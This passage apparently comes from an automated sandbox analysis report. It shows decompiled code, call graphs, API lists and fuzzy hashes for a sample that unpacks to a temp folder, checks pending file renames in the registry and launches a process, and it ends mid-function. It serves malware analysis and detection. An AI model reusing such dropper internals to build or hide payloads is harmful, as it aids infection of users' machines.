                                                                                                                                                                                                        • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                        • API String ID: 1979080616-3963195772
                                                                                                                                                                                                        • Opcode ID: b7695c1cfe828577a6c9df15e914f26981c2deb54c8b9238c7df990ed12db3db
                                                                                                                                                                                                        • Instruction ID: 10ed915f59c5d7d0656a0365ffb134573bf215d1f9199ebbb77d6eddddd266e1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b7695c1cfe828577a6c9df15e914f26981c2deb54c8b9238c7df990ed12db3db
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D312870730A25FBCB109F29AC486FE76DBAFF1740B5441BAA905C2144DF748EF18A81
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0021256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75registryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 563 21256d-21257d 564 212583-212589 563->564 565 212622-212627 call 2124e0 563->565 566 2125e8-212607 RegOpenKeyExA 564->566 567 21258b 564->567 571 212629-21262f 565->571 572 2125e3-2125e6 566->572 573 212609-212620 RegQueryInfoKeyA 566->573 570 212591-212595 567->570 567->571 570->571 574 21259b-2125ba RegOpenKeyExA 570->574 572->571 575 2125d1-2125dd RegCloseKey 573->575 574->572 576 2125bc-2125cb RegQueryValueExA 574->576 575->572 576->575
                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E0021256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E002124E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}











                                                                                                                                                                                                        0x00212572
                                                                                                                                                                                                        0x00212573
                                                                                                                                                                                                        0x00212575
                                                                                                                                                                                                        0x00212578
                                                                                                                                                                                                        0x0021257d
                                                                                                                                                                                                        0x00212627
                                                                                                                                                                                                        0x00212583
                                                                                                                                                                                                        0x00212586
                                                                                                                                                                                                        0x00212589
                                                                                                                                                                                                        0x002125eb
                                                                                                                                                                                                        0x00212607
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212609
                                                                                                                                                                                                        0x0021261a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021261a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021258b
                                                                                                                                                                                                        0x0021258b
                                                                                                                                                                                                        0x0021259e
                                                                                                                                                                                                        0x002125b2
                                                                                                                                                                                                        0x002125ba
                                                                                                                                                                                                        0x002125cb
                                                                                                                                                                                                        0x002125d1
                                                                                                                                                                                                        0x002125d6
                                                                                                                                                                                                        0x002125da
                                                                                                                                                                                                        0x002125dd
                                                                                                                                                                                                        0x002125dd
                                                                                                                                                                                                        0x002125e3
                                                                                                                                                                                                        0x002125e3
                                                                                                                                                                                                        0x002125e3
                                                                                                                                                                                                        0x0021258b
                                                                                                                                                                                                        0x00212589
                                                                                                                                                                                                        0x0021262f
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00214096,00214096,?,00211ED3,00000001,00000000,?,?,00214137,?), ref: 002125B2
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00214096,?,00211ED3,00000001,00000000,?,?,00214137,?,00214096), ref: 002125CB
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,00211ED3,00000001,00000000,?,?,00214137,?,00214096), ref: 002125DD
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00214096,00214096,?,00211ED3,00000001,00000000,?,?,00214137,?), ref: 002125FF
                                                                                                                                                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00214096,00000000,00000000,00000000,00000000,?,00211ED3,00000001,00000000), ref: 0021261A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager, xrefs: 002125A8
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 002125F5
                                                                                                                                                                                                        • PendingFileRenameOperations, xrefs: 002125C3
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                        • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                        • API String ID: 2209512893-559176071
                                                                                                                                                                                                        • Opcode ID: 21546b3e2abcb2cb04dfcd07d86f9921494ae1afd4d531a92c1806bf8b413e89
                                                                                                                                                                                                        • Instruction ID: c7cec7a07dd608680322f96d5e6e89352a8a330e404ec72c9a69903bf675b49c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 21546b3e2abcb2cb04dfcd07d86f9921494ae1afd4d531a92c1806bf8b413e89
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B118235922229FB9B209B919C4DDFBBEBCDF257A1F504055F808A2041DA704FA8D6A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00216A60 Relevance: 13.6, APIs: 9, Instructions: 138sleepCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 577 216a60-216a91 call 217155 call 217208 GetStartupInfoW 583 216a93-216aa2 577->583 584 216aa4-216aa6 583->584 585 216abc-216abe 583->585 586 216aa8-216aad 584->586 587 216aaf-216aba Sleep 584->587 588 216abf-216ac5 585->588 586->588 587->583 589 216ad1-216ad7 588->589 590 216ac7-216acf _amsg_exit 588->590 591 216b05 589->591 592 216ad9-216ae9 call 216c3f 589->592 593 216b0b-216b11 590->593 591->593 597 216aee-216af2 592->597 595 216b13-216b24 _initterm 593->595 596 216b2e-216b30 593->596 595->596 598 216b32-216b39 596->598 599 216b3b-216b42 596->599 597->593 600 216af4-216b00 597->600 598->599 601 216b44-216b51 call 217060 599->601 602 216b67-216b71 599->602 604 216c39-216c3e call 21724d 600->604 601->602 614 216b53-216b65 601->614 603 216b74-216b79 602->603 606 216bc5-216bc8 603->606 607 216b7b-216b7d 603->607 610 216bd6-216be3 _ismbblead 606->610 611 216bca-216bd3 606->611 612 216b94-216b98 607->612 613 216b7f-216b81 607->613 616 216be5-216be6 610->616 617 216be9-216bed 610->617 611->610 619 216ba0-216ba2 612->619 620 216b9a-216b9e 612->620 613->606 618 216b83-216b85 613->618 614->602 616->617 617->603 621 216c1e-216c25 617->621 618->612 622 216b87-216b8a 618->622 623 216ba3-216bbc call 212bfb 619->623 620->623 626 216c32 621->626 627 216c27-216c2d _cexit 621->627 622->612 625 216b8c-216b92 622->625 623->621 630 216bbe-216bbf exit 623->630 625->618 626->604 627->626 630->606
                                                                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00217155();
				_push(0x58);
				_push(0x2172b8);
				E00217208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x2188b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x2188b0; // 0x2
						if(__eflags != 0) {
							 *0x2181e4 = _t58;
							goto L13;
						} else {
							 *0x2188b0 = _t58;
							_t37 = E00216C3F(0x2110b8, 0x2110c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00216FF4();
						L13:
						_t68 =  *0x2188b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x2110b4);
							_push(0x2110ac);
							L00217202();
							 *0x2188b0 = 2;
						}
						if(_t53 == 0) {
							 *0x2188ac = 0;
						}
						_t71 =  *0x2188b4;
						if( *0x2188b4 != 0 && E00217060(_t71, 0x2188b4) != 0) {
							_t60 =  *0x2188b4; // 0x0
							 *0x21a288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x74895b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00212BFB(0x210000, 0, _t59); // executed
							 *0x2181e0 = _t30;
							__eflags =  *0x2181f8;
							if( *0x2181f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x2181e4;
							if( *0x2181e4 == 0) {
								__imp___cexit();
								_t30 =  *0x2181e0; // 0x80070002
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E0021724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}


















                                                                                                                                                                                                        0x00216a60
                                                                                                                                                                                                        0x00216a6a
                                                                                                                                                                                                        0x00216a6c
                                                                                                                                                                                                        0x00216a71
                                                                                                                                                                                                        0x00216a78
                                                                                                                                                                                                        0x00216a7f
                                                                                                                                                                                                        0x00216a85
                                                                                                                                                                                                        0x00216a8e
                                                                                                                                                                                                        0x00216a91
                                                                                                                                                                                                        0x00216a93
                                                                                                                                                                                                        0x00216a9c
                                                                                                                                                                                                        0x00216aa2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00216aa6
                                                                                                                                                                                                        0x00216ab4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00216aa8
                                                                                                                                                                                                        0x00216aaa
                                                                                                                                                                                                        0x00216aab
                                                                                                                                                                                                        0x00216aab
                                                                                                                                                                                                        0x00216abf
                                                                                                                                                                                                        0x00216abf
                                                                                                                                                                                                        0x00216ac5
                                                                                                                                                                                                        0x00216ad1
                                                                                                                                                                                                        0x00216ad7
                                                                                                                                                                                                        0x00216b05
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00216ad9
                                                                                                                                                                                                        0x00216ad9
                                                                                                                                                                                                        0x00216ae9
                                                                                                                                                                                                        0x00216af0
                                                                                                                                                                                                        0x00216af2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00216af4
                                                                                                                                                                                                        0x00216af4
                                                                                                                                                                                                        0x00216afb
                                                                                                                                                                                                        0x00216afb
                                                                                                                                                                                                        0x00216af2
                                                                                                                                                                                                        0x00216ac7
                                                                                                                                                                                                        0x00216ac7
                                                                                                                                                                                                        0x00216ac9
                                                                                                                                                                                                        0x00216b0b
                                                                                                                                                                                                        0x00216b0b
                                                                                                                                                                                                        0x00216b11
                                                                                                                                                                                                        0x00216b13
                                                                                                                                                                                                        0x00216b18
                                                                                                                                                                                                        0x00216b1d
                                                                                                                                                                                                        0x00216b24
                                                                                                                                                                                                        0x00216b24
                                                                                                                                                                                                        0x00216b30
                                                                                                                                                                                                        0x00216b39
                                                                                                                                                                                                        0x00216b39
                                                                                                                                                                                                        0x00216b3b
                                                                                                                                                                                                        0x00216b42
                                                                                                                                                                                                        0x00216b57
                                                                                                                                                                                                        0x00216b5f
                                                                                                                                                                                                        0x00216b65
                                                                                                                                                                                                        0x00216b65
                                                                                                                                                                                                        0x00216b67
                                                                                                                                                                                                        0x00216b6c
                                                                                                                                                                                                        0x00216b6e
                                                                                                                                                                                                        0x00216b71
                                                                                                                                                                                                        0x00216b74
                                                                                                                                                                                                        0x00216b74
                                                                                                                                                                                                        0x00216b79
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00216b7d
                                                                                                                                                                                                        0x00216b81
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00216b83
                                                                                                                                                                                                        0x00216b8c
                                                                                                                                                                                                        0x00216b8d
                                                                                                                                                                                                        0x00216b90
                                                                                                                                                                                                        0x00216b90
                                                                                                                                                                                                        0x00216b83
                                                                                                                                                                                                        0x00216b81
                                                                                                                                                                                                        0x00216b94
                                                                                                                                                                                                        0x00216b98
                                                                                                                                                                                                        0x00216ba2
                                                                                                                                                                                                        0x00216b9a
                                                                                                                                                                                                        0x00216b9a
                                                                                                                                                                                                        0x00216b9a
                                                                                                                                                                                                        0x00216ba3
                                                                                                                                                                                                        0x00216bab
                                                                                                                                                                                                        0x00216bb0
                                                                                                                                                                                                        0x00216bb5
                                                                                                                                                                                                        0x00216bbc
                                                                                                                                                                                                        0x00216bbf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00216bbf
                                                                                                                                                                                                        0x00216c1e
                                                                                                                                                                                                        0x00216c25
                                                                                                                                                                                                        0x00216c27
                                                                                                                                                                                                        0x00216c2d
                                                                                                                                                                                                        0x00216c2d
                                                                                                                                                                                                        0x00216c32
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00216bc5
                                                                                                                                                                                                        0x00216bc5
                                                                                                                                                                                                        0x00216bc8
                                                                                                                                                                                                        0x00216bcc
                                                                                                                                                                                                        0x00216bce
                                                                                                                                                                                                        0x00216bce
                                                                                                                                                                                                        0x00216bd1
                                                                                                                                                                                                        0x00216bd3
                                                                                                                                                                                                        0x00216bd3
                                                                                                                                                                                                        0x00216bd6
                                                                                                                                                                                                        0x00216bda
                                                                                                                                                                                                        0x00216be1
                                                                                                                                                                                                        0x00216be3
                                                                                                                                                                                                        0x00216be5
                                                                                                                                                                                                        0x00216be5
                                                                                                                                                                                                        0x00216be6
                                                                                                                                                                                                        0x00216be6
                                                                                                                                                                                                        0x00216be9
                                                                                                                                                                                                        0x00216bea
                                                                                                                                                                                                        0x00216bea
                                                                                                                                                                                                        0x00216b74
                                                                                                                                                                                                        0x00216c39
                                                                                                                                                                                                        0x00216c3e
                                                                                                                                                                                                        0x00216c3e
                                                                                                                                                                                                        0x00216abe
                                                                                                                                                                                                        0x00216abe
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00217155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00217182
                                                                                                                                                                                                          • Part of subcall function 00217155: GetCurrentProcessId.KERNEL32 ref: 00217191
                                                                                                                                                                                                          • Part of subcall function 00217155: GetCurrentThreadId.KERNEL32 ref: 0021719A
                                                                                                                                                                                                          • Part of subcall function 00217155: GetTickCount.KERNEL32 ref: 002171A3
                                                                                                                                                                                                          • Part of subcall function 00217155: QueryPerformanceCounter.KERNEL32(?), ref: 002171B8
                                                                                                                                                                                                        • GetStartupInfoW.KERNEL32(?,002172B8,00000058), ref: 00216A7F
                                                                                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00216AB4
                                                                                                                                                                                                        • _amsg_exit.MSVCRT ref: 00216AC9
                                                                                                                                                                                                        • _initterm.MSVCRT ref: 00216B1D
                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00216B49
                                                                                                                                                                                                        • exit.KERNELBASE ref: 00216BBF
                                                                                                                                                                                                        • _ismbblead.MSVCRT ref: 00216BDA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836923961-0
                                                                                                                                                                                                        • Opcode ID: 6edfbd9f7f57cf03c628b744f5661e38e5ae2192c1ff4e2dd475a8df085a7b98
                                                                                                                                                                                                        • Instruction ID: bdc471c579f8e78ced21c65abc3c3d623ce68b633c07eca783bb9e4398f33321
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6edfbd9f7f57cf03c628b744f5661e38e5ae2192c1ff4e2dd475a8df085a7b98
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C841C93197922A9FDB219F68E84D7EE77F4BB75714F24401AE841E3290CFB449E18B80
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 002158C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74memoryfileCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 631 2158c8-2158d5 632 2158d8-2158dd 631->632 632->632 633 2158df-2158f1 LocalAlloc 632->633 634 2158f3-215901 call 2144b9 633->634 635 215919-215959 call 211680 call 21658a CreateFileA LocalFree 633->635 638 215906-215910 call 216285 634->638 635->638 645 21595b-21596c CloseHandle GetFileAttributesA 635->645 644 215912-215918 638->644 645->638 646 21596e-215970 645->646 646->638 647 215972-21597b 646->647 647->644
                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E002158C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00211680(_t20, _t36, _t33);
					E0021658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x219124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E002144B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x219124 = E00216285();
					_t14 = 0;
				}
				return _t14;
			}













                                                                                                                                                                                                        0x002158cd
                                                                                                                                                                                                        0x002158d1
                                                                                                                                                                                                        0x002158d3
                                                                                                                                                                                                        0x002158d5
                                                                                                                                                                                                        0x002158d8
                                                                                                                                                                                                        0x002158d8
                                                                                                                                                                                                        0x002158da
                                                                                                                                                                                                        0x002158db
                                                                                                                                                                                                        0x002158e1
                                                                                                                                                                                                        0x002158ed
                                                                                                                                                                                                        0x002158f1
                                                                                                                                                                                                        0x0021591e
                                                                                                                                                                                                        0x0021592c
                                                                                                                                                                                                        0x00215943
                                                                                                                                                                                                        0x0021594a
                                                                                                                                                                                                        0x0021594d
                                                                                                                                                                                                        0x00215953
                                                                                                                                                                                                        0x00215959
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021595b
                                                                                                                                                                                                        0x0021595c
                                                                                                                                                                                                        0x00215963
                                                                                                                                                                                                        0x0021596c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215972
                                                                                                                                                                                                        0x00215974
                                                                                                                                                                                                        0x0021597a
                                                                                                                                                                                                        0x0021597a
                                                                                                                                                                                                        0x0021596c
                                                                                                                                                                                                        0x002158f3
                                                                                                                                                                                                        0x00215901
                                                                                                                                                                                                        0x00215906
                                                                                                                                                                                                        0x0021590b
                                                                                                                                                                                                        0x00215910
                                                                                                                                                                                                        0x00215910
                                                                                                                                                                                                        0x00215918

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00215534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 002158E7
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00215534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00215943
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00215534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0021594D
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00215534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0021595C
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00215534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00215963
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                                                                                                                                                                        • API String ID: 747627703-2825630923
                                                                                                                                                                                                        • Opcode ID: 8f47e808ce745c31e259e935bd07ab4c362571246b858cc993a48f839c9a6f01
                                                                                                                                                                                                        • Instruction ID: 12fa79ded507d7f2e7becd7fd32feb4bd2fb21ebdd37caf3e816c9e0e8c4fe96
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f47e808ce745c31e259e935bd07ab4c362571246b858cc993a48f839c9a6f01
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4117831621221BBC7201F796C4DBDB7EDDDFA6370B104665F50AD31C1CE7088A18AE0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00213FEF Relevance: 10.6, APIs: 7, Instructions: 97processsynchronizationwindowCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 675 213fef-214010 676 214016-21403b CreateProcessA 675->676 677 21410a-21411a call 216ce0 675->677 678 214041-21406e WaitForSingleObject GetExitCodeProcess 676->678 679 2140c4-214101 call 216285 GetLastError FormatMessageA call 2144b9 676->679 682 214091 call 21411b 678->682 683 214070-214077 678->683 693 214106 679->693 688 214096-2140b8 CloseHandle * 2 682->688 683->682 687 214079-21407b 683->687 687->682 690 21407d-214089 687->690 691 214108 688->691 692 2140ba-2140c0 688->692 690->682 694 21408b 690->694 691->677 692->691 695 2140c2 692->695 693->691 694->682 695->693
                                                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                                                        			E00213FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x218004; // 0x58ac7c6d
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00216CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x219124 = E00216285();
